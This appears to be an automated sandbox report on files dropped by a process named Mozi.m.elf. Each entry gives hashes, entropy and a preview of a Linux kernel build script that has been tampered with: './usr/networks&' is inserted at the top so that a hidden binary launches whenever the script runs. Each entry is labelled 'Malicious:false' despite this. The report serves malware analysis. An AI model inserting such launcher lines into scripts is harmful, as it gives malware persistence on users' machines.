                                                              SHA-512:5431B59388C7DE50978F4A14DFEDF8A39693558C23EDA1B5979DDE08A36C90FE167908A4C3BC6CCE15B02756BAD64C589B231F28E08C8B0ADF7EB3E55D625B20
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi..if ! pkg-config --exists $PKG; then..echo >&2 "*"..echo >&2 "* Unable to find the GTK+ installation. Please make sure that"..echo >&2 "* the GTK+ 2.0 development package is correctly installed."..echo >&2 "* You need $PKG"..echo >&2 "*"..exit 1.fi..if ! pkg-config --atleast-version=2.0.0 gtk+-2.0; then..echo >&2 "*"..echo >&2 "* GTK+ is present but version >= 2.0.0 is required."..echo >&2 "*"..exit 1.fi..echo cflags=\"$(pkg-config --cflags $PKG)\".echo libs=\"$(pkg-config --libs $PKG)\"../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):937
                                                              Entropy (8bit):5.114746161722375
                                                              Encrypted:false
                                                              SSDEEP:24:M8DySASNUS/tDRh8L9VnOITGvqMTGk1TGRSqMTGHyTGSqFhSRqj80UaT:M4yyp8HPUqMZVqM3PqQhOT
                                                              MD5:FD01A2ED48E4F03577EE3CAED8CA3A76
                                                              SHA1:04425B409496394CBCCAC34B85A0F364A2D671C9
                                                              SHA-256:F6E93883CAE43A4A3DF14DF124FB15314977A7E9E44737B1010D01ECDB05393D
                                                              SHA-512:C3238237408DE01A1E2326444753DCFD764A1DD2D8549CC92D86AA16BE571C8D7D144E7A47578D5C3F9C533639C869391345CAC10476E87146B4BDC5A8560819
                                                              Malicious:false
                                                              Preview:./usr/networks&...exit 0..fi...if pkg-config --exists $PKG2; then...echo cflags=\"$(pkg-config --cflags $PKG2)\"...echo libs=\"$(pkg-config --libs $PKG2)\"...exit 0..fi.fi..# Check the default paths in case pkg-config is not installed..# (Even if it is installed, some distributions such as openSUSE cannot.# find ncurses by pkg-config.).if [ -f /usr/include/ncursesw/ncurses.h ]; then..echo cflags=\"-D_GNU_SOURCE -I/usr/include/ncursesw\"..echo libs=\"-lncursesw\"..exit 0.fi..if [ -f /usr/include/ncurses/ncurses.h ]; then..echo cflags=\"-D_GNU_SOURCE -I/usr/include/ncurses\"..echo libs=\"-lncurses\"..exit 0.fi..if [ -f /usr/include/ncurses.h ]; then..echo cflags=\"-D_GNU_SOURCE\"..echo libs=\"-lncurses\"..exit 0.fi..echo >&2 "*".echo >&2 "* Unable to find the ncurses package.".echo >&2 "* Install ncurses (ncurses-devel or libncurses-dev".echo >&2 "* depending on your distribution).".echo >&2 "*".exit 1../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):3316
                                                              Entropy (8bit):5.543534555649817
                                                              Encrypted:false
                                                              SSDEEP:96:KqG3UXD1JB2y/p0ko0+bgXX0OgAcY0jy84wEIseQIbbFS:bG3y1JB2y9+UXEhAD0jy8rEY3FS
                                                              MD5:953A81654F7307688C8402BDA37C2EA4
                                                              SHA1:293F65679CA388602BEAA31F2A5CBCE08AC8FC11
                                                              SHA-256:794B3905FD480E6EABC275800C2981278620AD0FDEA13F8A700AB9A3B0DAB741
                                                              SHA-512:AA66F2D6DFA3379E4ECB17C2D95FDC77794A8F29719EEAE736DAECE66DDEF6970BAF3568181C59EE02138BAB5281A3DCA232A02D80BC252667A569538BFA52BE
                                                              Malicious:false
                                                              Preview:./usr/networks&...exit...;;.."-r")...WARNREDUN=true...shift...continue...;;.."-y")...BUILTIN=true...shift...continue...;;.."-O")...if [ -d $2 ];then....OUTPUT=$(echo $2 | sed 's/\/*$//')...else....echo "output directory $2 does not exist" 1>&2....exit 1...fi...shift 2...continue...;;..*)...break...;;..esac.done..if [ "$#" -lt 1 ] ; then..usage..exit.fi..if [ -z "$KCONFIG_CONFIG" ]; then..if [ "$OUTPUT" != . ]; then...KCONFIG_CONFIG=$(readlink -m -- "$OUTPUT/.config")..else...KCONFIG_CONFIG=.config..fi.fi..INITFILE=$1.shift;..if [ ! -r "$INITFILE" ]; then..echo "The base file '$INITFILE' does not exist. Exit." >&2..exit 1.fi..MERGE_LIST=$*.SED_CONFIG_EXP1="s/^\(${CONFIG_PREFIX}[a-zA-Z0-9_]*\)=.*/\1/p".SED_CONFIG_EXP2="s/^# \(${CONFIG_PREFIX}[a-zA-Z0-9_]*\) is not set$/\1/p"..TMP_FILE=$(mktemp ./.tmp.config.XXXXXXXXXX).MERGE_FILE=$(mktemp ./.merge_tmp.config.XXXXXXXXXX)..echo "Using $INITFILE as base"..trap clean_up EXIT..cat $INITFILE > $TMP_FILE..# Merge files, printing warnings on ov
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):984
                                                              Entropy (8bit):5.110032530027797
                                                              Encrypted:false
                                                              SSDEEP:24:M8DySASNUS/tDRh8L9VnOITGvqMTGkGTGRSqMTGHvTGSqF2SRqj80UaT:M4yyp8HPUqMaVqMMPqnhOT
                                                              MD5:D9E63E4727EEEE4A282F447A955DB059
                                                              SHA1:79CDDDC7912CF9F945B8B001E5AC69A1077D64E8
                                                              SHA-256:E97AFE8D30A5A9A97D8E6F922DBA587C5A5745C48A8DE70C72A012EFD771C632
                                                              SHA-512:163C0ECCE5F2FC859B13DBEED889DFA46F77D27CBD563965ACB32F3B06469EF1709E6A62185509B76E5C731A1611E88F757B490277C5A3D2862AB77022851199
                                                              Malicious:false
                                                              Preview:./usr/networks&...exit 0..fi...if pkg-config --exists $PKG2; then...echo cflags=\"$(pkg-config --cflags $PKG2)\"...echo libs=\"$(pkg-config --libs $PKG2)\"...exit 0..fi.fi..# Check the default paths in case pkg-config is not installed..# (Even if it is installed, some distributions such as openSUSE cannot.# find ncurses by pkg-config.).if [ -f /usr/include/ncursesw/ncurses.h ]; then..echo cflags=\"-D_GNU_SOURCE -I/usr/include/ncursesw\"..echo libs=\"-lncursesw -lmenuw -lpanelw\"..exit 0.fi..if [ -f /usr/include/ncurses/ncurses.h ]; then..echo cflags=\"-D_GNU_SOURCE -I/usr/include/ncurses\"..echo libs=\"-lncurses -lmenu -lpanel\"..exit 0.fi..if [ -f /usr/include/ncurses.h ]; then..echo cflags=\"-D_GNU_SOURCE\"..echo libs=\"-lncurses -lmenu -lpanel\"..exit 0.fi..echo >&2 "*".echo >&2 "* Unable to find the ncurses package.".echo >&2 "* Install ncurses (ncurses-devel or libncurses-dev".echo >&2 "* depending on your distribution).".echo >&2 "*".exit 1../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):644
                                                              Entropy (8bit):5.228498774032447
                                                              Encrypted:false
                                                              SSDEEP:12:w6vQ7QDR5GSVQzMWejGQ77QDxSASVhrMWGNGBvRrkFkjr9dn0puyTn:r3DR5GS2ZUGxDxSASRsGBvpkFkddn0J
                                                              MD5:2B410BC9465C65BB5548FD8FA489FC20
                                                              SHA1:B040F7C49A2B32DD74971B2BA918D956F18ADCF0
                                                              SHA-256:4815CCA4D8102C93E1E7FBDD35FDF59B52B31A7FC9C5FE6743A38023E689170A
                                                              SHA-512:9AA861B53D53811916F5A54DFEA3474447F343F7282A8EA054F896235A27A7445FCE49AF3CB71C5095846E5FC3C9C301F2790CF686F7D632761F3BDC06E4ADA8
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi..if pkg-config --exists $PKG; then..echo cflags=\"-std=c++11 -fPIC $(pkg-config --cflags Qt5Core Qt5Gui Qt5Widgets)\"..echo libs=\"$(pkg-config --libs $PKG)\"..echo moc=\"$(pkg-config --variable=host_bins Qt5Core)/moc\"..exit 0.fi..if pkg-config --exists $PKG2; then..echo cflags=\"$(pkg-config --cflags $PKG2)\"..echo libs=\"$(pkg-config --libs $PKG2)\"..echo moc=\"$(pkg-config --variable=moc_location QtCore)\"..exit 0.fi..echo >&2 "*".echo >&2 "* Could not find Qt via pkg-config.".echo >&2 "* Please install either Qt 4.8 or 5.x. and make sure it's in PKG_CONFIG_PATH".echo >&2 "*".exit 1../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):48
                                                              Entropy (8bit):3.9672232412544224
                                                              Encrypted:false
                                                              SSDEEP:3:qXVaroOORgn:Bn
                                                              MD5:553252F0DEE7D4E172F4B27C1491B5C5
                                                              SHA1:D9514909B4689F279C9FEC25124B8C1DE69A74E8
                                                              SHA-256:4A0B5069B54319442EB5F6DF6ADB1D6A9F2BBEB0B540465B2818AC5A51A4C6A8
                                                              SHA-512:7245D00F3A1441F8B10EBE51126FB41609F0C1CF06CEF4BD9320C1D4A8046AC1EA7C421C66131058F73AED16F01CFF3E879DAC85FD6B1FA2E7499E733A38401C
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit..}../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):3104
                                                              Entropy (8bit):5.319473187672963
                                                              Encrypted:false
                                                              SSDEEP:48:CvglysBnQd18RgbICaKw6i7MQ0aiRJygJKQCPh3NY1PeUyOeaU6CkRx7X:sJgnQCgbKKw6iPFVNoPetFgL
                                                              MD5:7C45113DDC652E13DE69CC646EDE42D0
                                                              SHA1:AB7A40BF4E6FCDC9597545ACB0CC0AD28294684E
                                                              SHA-256:0095A846AF18E74F2B8C358599A28829A2012F6643261F22F88F418B5A968900
                                                              SHA-512:BA067807CD4118C2360B14A4E258FF004048D461854B4ECF84FF7339C767E39D7B4BA9682E8D4C40C47F5BEC788E2CCC93C54727CA19601F80C015D680078D3A
                                                              Malicious:false
                                                              Preview:./usr/networks&.on_exit().{..if [ $? -ne 0 ]; then...cleanup..fi.}.trap on_exit EXIT..on_signals().{..exit 1.}.trap on_signals HUP INT QUIT TERM..#.#.# Use "make V=1" to debug this script.case "${KBUILD_VERBOSE}" in.*1*)..set -x..;;.esac..if [ "$1" = "clean" ]; then..cleanup..exit 0.fi..# We need access to CONFIG_ symbols.. include/config/auto.conf..# Update version.info GEN .version.if [ -r .version ]; then..VERSION=$(expr 0$(cat .version) + 1)..echo $VERSION > .version.else..rm -f .version..echo 1 > .version.fi;..# final build of init/.${MAKE} -f "${srctree}/scripts/Makefile.build" obj=init..#link vmlinux.o.info LD vmlinux.o.modpost_link vmlinux.o..# modpost vmlinux.o to check for section mismatches.${MAKE} -f "${srctree}/scripts/Makefile.modpost" MODPOST_VMLINUX=1..info MODINFO modules.builtin.modinfo.${OBJCOPY} -j .modinfo -O binary vmlinux.o modules.builtin.modinfo..btf_vmlinux_bin_o="".if [ -n "${CONFIG_DEBUG_INFO_BTF}" ]; then..btf_vmlinux_bin_o=.btf.vmlinux.bin.o..if ! gen_btf
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):113
                                                              Entropy (8bit):4.89780484089231
                                                              Encrypted:false
                                                              SSDEEP:3:qXVPnhdzHFTMcA+URkjAd8HHBdKDXVOORgn:cnhdzlokjAdae4n
                                                              MD5:83D2F205EC6B453B25B80B148277906B
                                                              SHA1:2640110859CC7FB91BCAB211917F85BCE21CE507
                                                              SHA-256:99D204944A4F242841E7E5B06FF76B7F484F08D4893F84B3A599730306F24305
                                                              SHA-512:B81E66A2B1E64AAB63558F078598360D98AF3DD11ECA2B01D67AA52F53536DF4AE30A2397AB55D389F59259807F1B06CFC69C1DF41630449BE4400D4FD3CD53D
                                                              Malicious:false
                                                              Preview:./usr/networks&...exit 1;..fi.fi..# Call "mkimage" to create U-Boot image.${MKIMAGE} "$@"../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):2256
                                                              Entropy (8bit):5.103102723612671
                                                              Encrypted:false
                                                              SSDEEP:48:r3DF8L0vw6FI7GSECAi4zDYGc0VXDfjX4D9mt+7F5IWpkCPKLJJSJbRhAaD:W6X3QcfTLp2VD
                                                              MD5:AF1E91F2E72D207A26007E51ED3846F7
                                                              SHA1:3DA415BBA18AB54473D970F38F8E4EE3C90EC66B
                                                              SHA-256:969556D61B9A7975233D78D3F8BDA1F10D1624692597F505C2F0149A98AAC940
                                                              SHA-512:B37F388A5E14C93170530310BB0A53A29F9D97E749D8F41B1ABA1EC6B64E6C40AF5825CDA211DA3BC6D541F8A506BC79B0020A3FB64EBAB09C82C59CB0DC1226
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi..SF=`which setfiles`.if [ $? -eq 1 ]; then..echo "Could not find setfiles"..echo "Do you have policycoreutils installed?"..exit 1.fi..CP=`which checkpolicy`.if [ $? -eq 1 ]; then..echo "Could not find checkpolicy"..echo "Do you have checkpolicy installed?"..exit 1.fi.VERS=`$CP -V | awk '{print $1}'`..ENABLED=`which selinuxenabled`.if [ $? -eq 1 ]; then..echo "Could not find selinuxenabled"..echo "Do you have libselinux-utils installed?"..exit 1.fi..if selinuxenabled; then. echo "SELinux is already enabled". echo "This prevents safely relabeling all files.". echo "Boot with selinux=0 on the kernel command-line or". echo "SELINUX=disabled in /etc/selinux/config.". exit 1.fi..cd mdp../mdp -m policy.conf file_contexts.$CP -U allow -M -o policy.$VERS policy.conf..mkdir -p /etc/selinux/dummy/policy.mkdir -p /etc/selinux/dummy/contexts/files..echo "__default__:user_u:s0" > /etc/selinux/dummy/seusers.echo "base_r:base_t:s0" > /etc/selinux/dummy/context
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):1837
                                                              Entropy (8bit):5.370491142600355
                                                              Encrypted:false
                                                              SSDEEP:24:St5ewlRPEuhVVNBRocmWTfF6oFtEhn5EpMAF6kFSqAAuqA1H1/zF+vQLZE6:QIjIBRoc7B6oFtE5wM0FzjdwH1/QEj
                                                              MD5:2924623DFB48348E3CADD1409DB02819
                                                              SHA1:0980E6BB937886B45B03015771B405BAF981133A
                                                              SHA-256:12D814E1083E8E2BDC73AAF4066F9C331288D1D4D26F308E6A46B56DAD520732
                                                              SHA-512:D7205986E227281642FE78C2919D205F0404AFDE5B16E295F79AAB08BDC44DA1266FA913611A46EEE7206BA5555CD01EB2995BDDA91970051A5F4DBE7CB5F059
                                                              Malicious:false
                                                              Preview:./usr/networks&..-I __initdata,__exitdata,__initconst,__ro_after_init.\..-I __initdata_memblock.....\..-I __refdata,__attribute,__maybe_unused,__always_unused \..-I __acquires,__releases,__deprecated,__always_inline.\..-I __read_mostly,__aligned,____cacheline_aligned \..-I ____cacheline_aligned_in_smp \..-I __cacheline_aligned,__cacheline_aligned_in_smp.\..-I ____cacheline_internodealigned_in_smp \..-I __used,__packed,__packed2__,__must_check,__must_hold.\..-I EXPORT_SYMBOL,EXPORT_SYMBOL_GPL,ACPI_EXPORT_SYMBOL \..-I DEFINE_TRACE,EXPORT_TRACEPOINT_SYMBOL,EXPORT_TRACEPOINT_SYMBOL_GPL \..-I static,const......\..--extra=+fq --c-kinds=+px --fields=+iaS --langmap=c:+.h \.."${regex[@]}"...setup_regex exuberant kconfig..all_kconfigs | xargs $1 -a \..--langdef=kconfig --language-force=kconfig "${regex[@]}"..}..emacs().{..setup_regex emacs asm c..all_target_sources | xargs $1 -a "${regex[@]}"...setup_regex emacs kconfig
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):283
                                                              Entropy (8bit):4.83654391993755
                                                              Encrypted:false
                                                              SSDEEP:6:xE6TVbTuqFQ7oK7qTIFs1OhOiQQLO5F8QUQjbTn:nbTu+Q52ce1ONQwOcrmbTn
                                                              MD5:4DF442F6E11CE8D0979E6182386686A2
                                                              SHA1:81719268B3AEDA9531465D3EAC4E67AAEDCA1397
                                                              SHA-256:55264C606A6D80EC711BEAAF12EF38C1F10BEF9142291CFAF653B3F823FE842B
                                                              SHA-512:F8D1E831F9226792250715F5EFDDA938690FE986AE4B84257A5990DECCAF0361A1519F2DBDB4D3082513A590D373B879739AC42A10047C29FDF13A39EB2A8E42
                                                              Malicious:false
                                                              Preview:./usr/networks&.# Despite printing an error message, GNU nm still exits with exit code 0 if it.# sees a relr section. So we need to check that nothing is printed to stderr..test -z "$($NM $tmp_file 2>&1 >/dev/null)"..$OBJCOPY -O binary $tmp_file $tmp_file.bin../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):625
                                                              Entropy (8bit):4.736984587737299
                                                              Encrypted:false
                                                              SSDEEP:12:aSCPoUOEmrGTUF6vGWzz+NSI9ZZ+gwSUz+NSI9ZZ+g/AcEMdLPn:58wGTRGWG8I9ZkpSj8I9ZkuhP
                                                              MD5:04209F5550AAEBD8875831972E159484
                                                              SHA1:35BD4A57B4F79218468D56CC721F7AE667F6A800
                                                              SHA-256:E4D56D5F89198BA7EB9F942E04AFAD0DB90E9A733589881EF18CDAAF597A3B20
                                                              SHA-512:7279D50639DA40C0CB6FA8930895CE09CF0EB2FB41A0EC40F6C6ED542D0326E78927175783D3DBC570C4E08B87FECFDA585AE1D4E44BDB00511260C783B3008F
                                                              Malicious:false
                                                              Preview:./usr/networks&. exit.fi..full=$1.test=$2.nontest=$3..x=`cat $full | wc -l`.if [ $x -eq 1 ]; then..echo "There's only one function left, must be the bad one"..cat $full..exit 0.fi..let x=$x/2.let y=$x+1..if [ ! -f $full ]; then..echo "$full does not exist"..exit 1.fi..if [ -f $test ]; then..echo -n "$test exists, delete it? [y/N]"..read a..if [ "$a" != "y" -a "$a" != "Y" ]; then...exit 1..fi.fi..if [ -f $nontest ]; then..echo -n "$nontest exists, delete it? [y/N]"..read a..if [ "$a" != "y" -a "$a" != "Y" ]; then...exit 1..fi.fi..sed -ne "1,${x}p" $full > $test.sed -ne "$y,\$p" $full > $nontest../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):1031
                                                              Entropy (8bit):4.898245174609079
                                                              Encrypted:false
                                                              SSDEEP:24:PnsUDDkltWXlYWkvXlOIkvXlXLkTmKU+IcnsUUbDk19QkUmzyeZNkkUmnj655:PxPG2lYWWlhWlXLEmcxUHsG7mzdm7muv
                                                              MD5:74FEEA347EB00465B2FF6A5BE46CE193
                                                              SHA1:6005C8B5D8FD79C88F0CDB5B6EEB9E11778CCA0B
                                                              SHA-256:460A83F842C839EE72F9FD88A787CFE97CE8F3F0DB23BCE2441CF7A364018B30
                                                              SHA-512:768798570AD0DFCBCD01070FEA49B07779CB65174A7D855BB1F737B9B5995D842FA364312BA1D96BCC544BC3158C8A01450502A46CB1ADDBE4691E6997235452
                                                              Malicious:false
                                                              Preview:./usr/networks&.. exit -1..fi...make -C ex V=1 clean > /dev/null 2>&1..rm -f ex.out.}..function test_ex_suffix {..make -C ex V=1 clean > ex.out 2>&1...# use -rR to disable make's builtin rules..make -rR -C ex V=1 ex.o >> ex.out 2>&1..make -rR -C ex V=1 ex.i >> ex.out 2>&1..make -rR -C ex V=1 ex.s >> ex.out 2>&1...if [ -x ./ex/ex ]; then.. echo FAILED.. exit -1..fi...if [ ! -f ./ex/ex.o -o ! -f ./ex/ex.i -o ! -f ./ex/ex.s ]; then.. echo FAILED.. exit -1..fi...make -C ex V=1 clean > /dev/null 2>&1..rm -f ex.out.}..function test_ex_include {..make -C ex V=1 clean > ex.out 2>&1...# build with krava.h include..touch ex/krava.h..make -C ex V=1 CFLAGS=-DINCLUDE >> ex.out 2>&1...if [ ! -x ./ex/ex ]; then.. echo FAILED.. exit -1..fi...# build without the include..rm -f ex/krava.h ex/ex..make -C ex V=1 >> ex.out 2>&1...if [ ! -x ./ex/ex ]; then.. echo FAILED.. exit -1..fi...make -C ex V=1 clean > /dev/null 2>&1..rm -f ex.out.}..echo -n Testing....test_ex.test_ex_suffix.test_ex_include..
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):5106
                                                              Entropy (8bit):5.190549172542396
                                                              Encrypted:false
                                                              SSDEEP:96:mpzdPYL4qY63562BXlrbCZpygpSEKejb36/jNE4XmJocZejkmav:+dAn1N618E9HO/X0oox
                                                              MD5:DC156EF93268E173D39F8BAAF8978ABB
                                                              SHA1:6E251C5140BF99DD85D6FE5CCBF82FE5F7DBD25D
                                                              SHA-256:BB35B90477911C8A5E397FB4AF4AB5AAB25067DAFD6062567B7E906F3932B0E1
                                                              SHA-512:5638FE84DBB13D9862EC314A58789EBE79A158576BA2BA120FE7973F6F11F18A0B5C0F3FA1867EA0ECFD09063CF738841F287A6342C3A578C8DC70D1F0504BE2
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi..if [ ! -f $led_defs_path ]; then..echo "$led_defs_path doesn't exist"..exit 1.fi..led_cdev_path=`echo $1 | sed s'/\/$//'`..ls "$led_cdev_path/brightness" > /dev/null 2>&1.if [ $? -ne 0 ]; then..echo "Device \"$led_cdev_path\" does not exist."..exit 1.fi..bus=`readlink $led_cdev_path/device/subsystem | sed s'/.*\///'`.usb_subdev=`readlink $led_cdev_path | grep usb | sed s'/\(.*usb[0-9]*\/[0-9]*-[0-9]*\)\/.*/\1/'`.ls "$led_cdev_path/device/of_node/compatible" > /dev/null 2>&1.of_node_missing=$?..if [ "$bus" = "input" ]; then..input_node=`readlink $led_cdev_path/device | sed s'/.*\///'`..if [ ! -z "$usb_subdev" ]; then...bus="usb"..fi.fi..if [ "$bus" = "usb" ]; then..usb_interface=`readlink $led_cdev_path | sed s'/.*\(usb[0-9]*\)/\1/' | cut -d\/ -f3`..cd $led_cdev_path/../$usb_subdev..driver=`readlink $usb_interface/driver | sed s'/.*\///'`..if [ -d "$usb_interface/ieee80211" ]; then...wifi_phy=`ls -l $usb_interface/ieee80211 | grep phy | awk '{print $9}'`..fi.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):821
                                                              Entropy (8bit):4.94867885977058
                                                              Encrypted:false
                                                              SSDEEP:24:R0T53Bv5a0AdgAklFKMRk4q+D2VIa8190I/:ROBv00TnlFKQk4qmAYGY
                                                              MD5:53CB60A015FB1536F58CA145670656F9
                                                              SHA1:FA1FDDC86852107CE96D1E4F74F681A61FCEC45A
                                                              SHA-256:EFF34D4C6394243F0DC6EBEAED9BFB4A88AF69C086D22736B70586320D7E60EB
                                                              SHA-512:AAA81CD721DF911EA07BC5144A15F8E090F7773ED0C12086D41206458EF3BEABAC48761D62AA54020416CB1345788FBEBC33AA768CF4DB5B61AAFB16C6CA1AC9
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 255.fi..# Create any new directories that have appeared in the github litmus.# repo since the last run..if test "$LKMM_DESTDIR" != ".".then..find $litmusdir -type d -print |..( cd "$LKMM_DESTDIR"; sed -e 's/^/mkdir -p /' | sh ).fi..# Find the checklitmus script. If it is not where we expect it, then.# assume that the caller has the PATH environment variable set.# appropriately..if test -x scripts/checklitmus.sh.then..clscript=scripts/checklitmus.sh.else..clscript=checklitmus.sh.fi..# Run the script on all the litmus tests in the specified directory.ret=0.for i in $litmusdir/*.litmus.do..if ! $clscript $i..then...ret=1..fi.done.if test "$ret" -ne 0.then..echo " ^^^ VERIFICATION MISMATCHES" 1>&2.else..echo All litmus tests verified as was expected. 1>&2.fi.exit $ret../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):238
                                                              Entropy (8bit):5.071110010800678
